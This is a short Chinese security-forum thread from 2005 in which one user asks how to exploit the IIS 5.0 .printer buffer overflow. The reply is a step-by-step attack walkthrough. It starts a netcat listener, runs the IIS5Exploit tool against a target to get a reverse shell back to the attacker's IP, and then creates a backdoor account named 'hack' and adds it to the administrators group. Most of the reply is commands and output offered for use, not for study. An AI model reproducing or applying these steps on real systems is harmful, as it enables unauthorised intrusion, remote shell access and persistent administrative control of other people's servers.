|
作者: lu_wakin [lu_wakin] 论坛用户 | 登录 |
IIS5.0 NULL.Printer Exploit 如何溢出 |
地主 发表时间: 05-02-19 15:38 |
回复: bluehacker [bluehacker] 论坛用户 | 登录 |
小榕写的exploit:IIS5Exploit可用。 适用于IIS5.0 英文版,详细情况请参见说明 1、首先在本机用NC开一个监听端口。 C:\>nc -l -p 99 2、运行IIS5Exploit D:\> IIS5Exploit xxx.xxx.xxx.xxx 211.152.188.1 99 ===========IIS5 English Version .Printer Exploit.=========== ===Written by Assassin 1995-2001. http://www.netXeyes.com=== Connecting 211.152.188.1 ...OK. Send Shell Code ...OK IIS5 Shell Code Send OK 其中211.152.188.1指向本地IP。 稍等片刻,如果成功在本机NC舰艇的端口出现: C:\>nc -l -p 99 Microsoft Windows 2000[Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\> 可以执行命令。如: C:\>net user hack password /add The command completed successfully. C:\>net localgroup administrartors hack /add The command completed successfully. 这样就创建了一个属于Administrator组的用户Hack,密码为password [此贴被 bluehacker(bluehacker) 在 02月19日16时14分 编辑过] [此贴被 bluehacker(bluehacker) 在 02月19日16时15分 编辑过] |
B1层 发表时间: 05-02-19 16:11 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号